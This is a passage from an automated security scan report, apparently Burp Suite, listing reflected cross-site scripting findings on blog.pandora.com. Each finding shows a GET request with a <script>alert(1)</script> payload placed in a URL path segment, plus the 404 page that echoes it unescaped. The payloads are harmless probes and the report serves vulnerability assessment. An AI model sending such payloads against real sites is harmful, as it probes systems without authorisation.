This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ was not found on this server.</p>
...[SNIP]...

1.249. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0526<script>alert(1)</script>0f0e93964d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ was not found on this server.</p>
...[SNIP]...

1.250. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68e05<script>alert(1)</script>4497e666453 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ was not found on this server.</p>
...[SNIP]...

1.251. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42f15<script>alert(1)</script>866bd41379a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ was not found on this server.</p>
...[SNIP]...

1.252. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/09/tim-on-cnbc-1.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88323<script>alert(1)</script>dd84e5ab0d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 367
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...

1.253. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/09/tim-on-cnbc-1.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd772<script>alert(1)</script>ee6bc22579c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...

1.254. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/09/tim-on-cnbc-1.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 244d1<script>alert(1)</script>0057edf899 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 366


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...

1.255. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/09/tim-on-cnbc-1.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 80718<script>alert(1)</script>b33c32116fb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...

1.256. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/09/tim-on-cnbc-1.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7f010<script>alert(1)</script>db22de039d1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 was not found on this server.</p>
...[SNIP]...

1.257. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a980<script>alert(1)</script>ab4f3aefded was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ was not found on this server.</p>
...[SNIP]...

1.258. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9630<script>alert(1)</script>c4b6b39b005 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ was not found on this server.</p>
...[SNIP]...

1.259. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52dc5<script>alert(1)</script>f6f7326f783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ was not found on this server.</p>
...[SNIP]...

1.260. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 46f70<script>alert(1)</script>135aca784e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ was not found on this server.</p>
...[SNIP]...

1.261. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/an-update-on-pa.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 639cf<script>alert(1)</script>9472b7ae95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 368


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...

1.262. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/an-update-on-pa.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f725<script>alert(1)</script>f0ece6ca7d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...

1.263. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/an-update-on-pa.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4a6a1<script>alert(1)</script>e95f295a886 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...

1.264. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/an-update-on-pa.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 93473<script>alert(1)</script>78dc3d1265 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 368


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
